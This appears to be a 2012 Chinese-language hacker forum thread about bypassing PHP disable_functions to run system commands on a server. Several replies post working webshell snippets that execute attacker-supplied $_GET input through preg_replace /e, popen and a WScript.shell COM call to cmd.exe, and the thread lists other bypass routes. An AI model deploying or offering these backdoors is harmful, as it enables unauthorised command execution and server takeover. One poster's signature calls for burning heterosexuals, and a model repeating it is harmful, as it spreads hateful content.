disable_functions:phpinfo,passthru,system,chroot,scandir,chgrp,shell_exec,proc_open,proc_get_status,ini_after,ini_after,ini_restore,dl,pfsockopen,openlog,sysl,exec,chmod,file_put_contents
木易木兆 (烧死异性恋!!!!!!!!!) | 2012-09-24 10:09
preg_replace即可
<?php preg_replace("/test/e",$_GET["h"],"jutst test"); ?>
xsjswt | 2012-09-24 10:23
@木易木兆 亲,不是执行php命令,是想执行系统命令,或者做个代理,扫端口什么的
xsser (十根阳具有长短,世上人多心不齐) | 2012-09-24 11:22
太easy了,出10个wb我给你三种姿势绕过的方法
木易木兆 (烧死异性恋!!!!!!!!!) | 2012-09-24 11:23
@xsser 10个基友之吻行不行?
蟋蟀哥哥 (http://zone.wooyun.org/?do=action) | 2012-09-24 11:29
@xsser 几种体位?
GaRY | 2012-09-24 13:10
@xsser 出招了,lz接着
goderci (</null>) | 2012-09-24 13:20
@xsjswt @xsser 敲诈楼主不解释
cnrstar (Be My Personal Best!) | 2012-09-24 13:21
姿势1:popen()
if (key($_GET)=="popen") { $pp = popen($_GET['popen'], 'r'); $read = fread($pp, 2096); echo $read; pclose($pp);
姿势2 wscript.shell
if (key($_GET)=="wscript") { $wsh = new COM('WScript.shell') or die("PHP Create COM wscript.shell failed"); $exec = $wsh->exec ("cm"."d.e"."xe /c ".$_GET['wscript'].""); $stdout = $exec->StdOut(); $stroutput = $stdout->ReadAll(); echo $stroutput; }
姿势3 Shell.Application
<?php $wsh = new COM('Shell.Application') or die("Shell.Application"); $exec = $wsh->open("C:\\windows\\system32\\calc.exe"); ?>
xsjswt | 2012-09-24 14:21
@cnrstar popen在安全模式下要被XX,那个安全目录是undef
xsjswt | 2012-09-24 14:21
@cnrstar stuhome是Linux的
xsser (十根阳具有长短,世上人多心不齐) | 2012-09-24 14:30
@xsjswt 都安全模式了 你去死
cnrstar (Be My Personal Best!) | 2012-09-24 15:32
@xsjswt @xsser 安全模式下貌似真是无解的。。反正我是看到安全模式就不知道怎么执行命令了。
Lmy | 2012-09-24 15:46
我也头大呢。求解。。
Matt | 2012-09-24 15:56
ssh_exec
xsjswt | 2012-09-24 16:01
@xsser 你不是很多姿势的么
xsjswt | 2012-09-24 16:03
@Matt 也算,但是和expect:// ssh://一样是要装拓展的,人家米装的嘛,或者装的人根本没几个
CHForce | 2012-09-24 18:54
rank == 0 的路过